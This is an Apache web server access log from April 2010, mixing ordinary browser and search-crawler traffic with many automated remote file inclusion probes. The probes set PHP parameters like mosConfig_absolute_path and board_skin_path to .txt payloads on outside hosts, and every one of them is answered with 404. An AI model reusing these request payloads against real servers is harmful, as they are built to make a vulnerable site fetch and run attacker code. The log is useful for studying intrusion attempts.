85.243.101.213 - - [07/Apr/2010:06:40:02 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET CLR 3.0.30618; InfoPath.2; Media Center PC 5.0; SLCC1)"
85.243.101.213 - - [07/Apr/2010:06:40:03 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET CLR 3.0.30618; InfoPath.2; Media Center PC 5.0; SLCC1)"
85.243.101.213 - - [07/Apr/2010:06:40:03 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET CLR 3.0.30618; InfoPath.2; Media Center PC 5.0; SLCC1)"
202.72.242.242 - - [07/Apr/2010:06:40:20 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.rittsound.com//components/com_akobook//id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
202.72.242.242 - - [07/Apr/2010:06:40:20 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.rittsound.com//components/com_akobook//id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
202.72.242.242 - - [07/Apr/2010:06:40:20 -0400] "GET /logs/access_log.Q109051700%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.rittsound.com//components/com_akobook//id1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
202.72.242.242 - - [07/Apr/2010:06:41:00 -0400] "GET /logs/access_log.Q110030800%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.rittsound.com//components/com_akobook//id1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:41:55 -0400] "GET //admin/modules/blocks.php?spaw_root=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:41:55 -0400] "GET /logs//admin/modules/blocks.php?spaw_root=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:41:59 -0400] "GET /logs//admin/modules/blocks.php?spaw_root=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:41:59 -0400] "GET //admin/modules/blocks.php?spaw_root=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:42:10 -0400] "GET //admin/modules/blocks.php?spaw_root=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:42:11 -0400] "GET //admin/modules/blocks.php?spaw_root=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:42:11 -0400] "GET /logs//admin/modules/blocks.php?spaw_root=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:42:11 -0400] "GET /logs//admin/modules/blocks.php?spaw_root=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.195.114.252 - - [07/Apr/2010:06:41:41 -0400] "GET /logs/access_log.Q109052700 HTTP/1.0" 200 4217417 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
202.72.242.242 - - [07/Apr/2010:06:42:54 -0400] "GET //delete_all.php?board_skin_path=http://www.rittsound.com//components/com_akobook//id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
202.72.242.242 - - [07/Apr/2010:06:42:54 -0400] "GET /logs//delete_all.php?board_skin_path=http://www.rittsound.com//components/com_akobook//id1.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
202.72.242.242 - - [07/Apr/2010:06:42:54 -0400] "GET /logs/error_log.Q110010500%20%20//delete_all.php?board_skin_path=http://www.rittsound.com//components/com_akobook//id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
209.59.12.99 - - [07/Apr/2010:06:43:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
58.230.162.220 - - [07/Apr/2010:06:43:42 -0400] "GET /logs//admin/modules/blocks.php?spaw_root=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:43:42 -0400] "GET /logs/access_log.Q109100200%20%20//admin/modules/blocks.php?spaw_root=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:43:43 -0400] "GET //admin/modules/blocks.php?spaw_root=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:43:43 -0400] "GET /logs/access_log.Q109100200%20%20//admin/modules/blocks.php?spaw_root=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:43:43 -0400] "GET /logs//admin/modules/blocks.php?spaw_root=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:43:43 -0400] "GET //admin/modules/blocks.php?spaw_root=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:43:43 -0400] "GET /logs//admin/modules/blocks.php?spaw_root=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:43:43 -0400] "GET //admin/modules/blocks.php?spaw_root=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:43:43 -0400] "GET /logs/access_log.Q109100200%20%20//admin/modules/blocks.php?spaw_root=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
67.195.114.252 - - [07/Apr/2010:06:43:11 -0400] "GET /logs/error_log.Q109091000 HTTP/1.0" 200 3095222 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
58.230.162.220 - - [07/Apr/2010:06:43:51 -0400] "GET /logs/access_log.Q109100200%20%20//admin/modules/blocks.php?spaw_root=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:43:51 -0400] "GET //admin/modules/blocks.php?spaw_root=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:43:52 -0400] "GET /logs//admin/modules/blocks.php?spaw_root=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
66.249.65.182 - - [07/Apr/2010:06:43:57 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L02033C553BB4D9008F90094+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
95.108.128.242 - - [07/Apr/2010:06:44:01 -0400] "GET /images/_notes/nav_store_cart_over_r1_c2.jpg.mno HTTP/1.1" 200 208 "-" "Yandex/1.01.001 (compatible; Win16; I)"
67.205.63.238 - - [07/Apr/2010:06:44:40 -0400] "GET /logs/access_log.Q110021900//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.205.63.238 - - [07/Apr/2010:06:44:40 -0400] "GET //index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
67.205.63.238 - - [07/Apr/2010:06:44:40 -0400] "GET /logs//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
67.195.114.252 - - [07/Apr/2010:06:44:22 -0400] "GET /logs/error_log.Q109073100 HTTP/1.0" 200 2497586 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.205.63.238 - - [07/Apr/2010:06:44:50 -0400] "GET /logs/access_log.Q110022700//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:06:45:36 -0400] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:06:45:36 -0400] "GET /logs/access_log.Q110020700//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:06:45:37 -0400] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:47:15 -0400] "GET //delete_all.php?board_skin_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:47:16 -0400] "GET /logs//delete_all.php?board_skin_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:47:16 -0400] "GET //delete_all.php?board_skin_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:47:16 -0400] "GET /logs//delete_all.php?board_skin_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:47:16 -0400] "GET //delete_all.php?board_skin_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:47:16 -0400] "GET /logs//delete_all.php?board_skin_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:47:16 -0400] "GET /logs/access_log.Q109081300%20%20//delete_all.php?board_skin_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:47:16 -0400] "GET /logs/access_log.Q109081300%20%20//delete_all.php?board_skin_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:47:16 -0400] "GET /logs/access_log.Q109081300%20%20//delete_all.php?board_skin_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:47:16 -0400] "GET //delete_all.php?board_skin_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:47:16 -0400] "GET /logs//delete_all.php?board_skin_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:47:16 -0400] "GET /logs/access_log.Q109081300%20%20//delete_all.php?board_skin_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:47:58 -0400] "GET /logs//delete_all.php?board_skin_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:47:59 -0400] "GET //delete_all.php?board_skin_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:47:59 -0400] "GET /logs/access_log.Q109072200//delete_all.php?board_skin_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:48:03 -0400] "GET //delete_all.php?board_skin_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
95.108.128.242 - - [07/Apr/2010:06:48:03 -0400] "GET /images/_notes/download_cat_bone.jpg.mno HTTP/1.1" 200 260 "-" "Yandex/1.01.001 (compatible; Win16; I)"
58.230.162.220 - - [07/Apr/2010:06:48:03 -0400] "GET /logs//delete_all.php?board_skin_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:48:04 -0400] "GET /logs/access_log.Q109072200//delete_all.php?board_skin_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:48:07 -0400] "GET //delete_all.php?board_skin_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:48:07 -0400] "GET /logs//delete_all.php?board_skin_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:48:08 -0400] "GET /logs/access_log.Q109072200//delete_all.php?board_skin_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
66.249.65.179 - - [07/Apr/2010:06:48:09 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.179 - - [07/Apr/2010:06:48:09 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L0199305638C145009F4B02H+WSEQ(S0060):1+OUITEM(A0200):45417901 HTTP/1.1" 200 27013 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
58.230.162.220 - - [07/Apr/2010:06:48:11 -0400] "GET /logs/access_log.Q109072200//delete_all.php?board_skin_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:48:14 -0400] "GET //delete_all.php?board_skin_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:48:14 -0400] "GET /logs//delete_all.php?board_skin_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
125.251.197.130 - - [07/Apr/2010:06:49:23 -0400] "GET //doc/include/bbs.lib.inc.php?site_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
125.251.197.130 - - [07/Apr/2010:06:49:23 -0400] "GET /logs//doc/include/bbs.lib.inc.php?site_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
125.251.197.130 - - [07/Apr/2010:06:49:44 -0400] "GET //doc/include/bbs.lib.inc.php?site_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
125.251.197.130 - - [07/Apr/2010:06:49:44 -0400] "GET /logs//doc/include/bbs.lib.inc.php?site_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:06:49:49 -0400] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:06:49:49 -0400] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:06:49:49 -0400] "GET /logs/access_log.Q110022700%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:06:50:08 -0400] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:06:50:08 -0400] "GET /logs/access_log.Q110022700%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:06:50:08 -0400] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
128.210.4.82 - - [07/Apr/2010:06:50:16 -0400] "GET /logs//download.php?board_skin_path=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
128.210.4.82 - - [07/Apr/2010:06:50:16 -0400] "GET //download.php?board_skin_path=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
128.210.4.82 - - [07/Apr/2010:06:50:36 -0400] "GET /logs/access_log.Q109102300//download.php?board_skin_path=http://124.139.66.60/~home06dfl/bbs/img/btn/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:51:00 -0400] "GET //delete_all.php?board_skin_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:51:00 -0400] "GET //delete_all.php?board_skin_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:51:00 -0400] "GET /logs//delete_all.php?board_skin_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:51:01 -0400] "GET //delete_all.php?board_skin_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:51:01 -0400] "GET /logs//delete_all.php?board_skin_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:51:01 -0400] "GET /logs//delete_all.php?board_skin_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:51:01 -0400] "GET /logs/access_log.Q109101600%20%20//delete_all.php?board_skin_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:51:01 -0400] "GET //delete_all.php?board_skin_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:51:01 -0400] "GET /logs//delete_all.php?board_skin_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:51:01 -0400] "GET /logs/access_log.Q109101600%20%20//delete_all.php?board_skin_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:51:01 -0400] "GET /logs/access_log.Q109101600%20%20//delete_all.php?board_skin_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:51:01 -0400] "GET /logs/access_log.Q109101600%20%20//delete_all.php?board_skin_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
209.59.12.99 - - [07/Apr/2010:06:51:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
58.230.162.220 - - [07/Apr/2010:06:51:25 -0400] "GET /logs//delete_all.php?board_skin_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:51:25 -0400] "GET /logs/access_log.Q109101600//delete_all.php?board_skin_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:06:51:25 -0400] "GET //delete_all.php?board_skin_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:06:51:27 -0400] "GET /logs//bbs///delete_all.php?board_skin_path=http://www.iammonline.it/nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:06:51:27 -0400] "GET //bbs///delete_all.php?board_skin_path=http://www.iammonline.it/nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:06:51:27 -0400] "GET /logs/access_log.Q110031500%20%20//bbs///delete_all.php?board_skin_path=http://www.iammonline.it/nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
95.108.128.242 - - [07/Apr/2010:06:52:04 -0400] "GET /images/_notes/download_cat_missing.jpg.mno HTTP/1.1" 200 260 "-" "Yandex/1.01.001 (compatible; Win16; I)"
216.121.63.153 - - [07/Apr/2010:06:52:19 -0400] "GET /solpot.html?body=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:06:52:19 -0400] "GET /logs/solpot.html?body=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:06:52:19 -0400] "GET /logs/access_log.Q110010300%20%20/solpot.html?body=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:06:52:23 -0400] "GET /solpot.html?body=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:06:52:23 -0400] "GET /logs/solpot.html?body=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:06:52:23 -0400] "GET /logs/access_log.Q110010300%20%20/solpot.html?body=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:06:52:24 -0400] "GET /logs/solpot.html?body=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:06:52:27 -0400] "GET /solpot.html?body=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:06:52:27 -0400] "GET /logs/access_log.Q110010300%20%20/solpot.html?body=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
78.24.217.100 - - [07/Apr/2010:06:52:30 -0400] "GET /logs/access_log.Q109052100%20%20/SSI.php?sourcedir=http://pelet.at.ua/bogel/id1.txt????? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
78.24.217.100 - - [07/Apr/2010:06:52:30 -0400] "GET /SSI.php?sourcedir=http://pelet.at.ua/bogel/id1.txt????? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
78.24.217.100 - - [07/Apr/2010:06:52:30 -0400] "GET /logs/SSI.php?sourcedir=http://pelet.at.ua/bogel/id1.txt????? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
78.24.217.100 - - [07/Apr/2010:06:52:30 -0400] "GET /logs/access_log.Q109081800%20%20/SSI.php?sourcedir=http://pelet.at.ua/bogel/id1.txt????? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
78.24.217.100 - - [07/Apr/2010:06:52:30 -0400] "GET /logs/access_log.Q109052100/SSI.php?sourcedir=http://pelet.at.ua/bogel/id1.txt????? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:06:52:30 -0400] "GET /logs/error_log.Q110010300%20%20/solpot.html?body=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
78.24.217.100 - - [07/Apr/2010:06:52:30 -0400] "GET /logs/access_log.Q109081800/SSI.php?sourcedir=http://pelet.at.ua/bogel/id1.txt????? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:06:52:31 -0400] "GET /logs/error_log.Q110010300%20%20/solpot.html?body=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:06:52:31 -0400] "GET /logs/error_log.Q110010300%20%20/solpot.html?body=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:06:52:33 -0400] "GET /solpot.html?body=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:06:52:33 -0400] "GET /logs/solpot.html?body=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:06:52:34 -0400] "GET /logs/access_log.Q109101500/solpot.html?body=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:06:52:36 -0400] "GET /solpot.html?body=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:06:52:36 -0400] "GET /logs/solpot.html?body=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:06:52:36 -0400] "GET /logs/access_log.Q109101500/solpot.html?body=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:06:52:40 -0400] "GET /solpot.html?body=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:06:52:40 -0400] "GET /logs/solpot.html?body=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:06:52:40 -0400] "GET /solpot.html?body=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
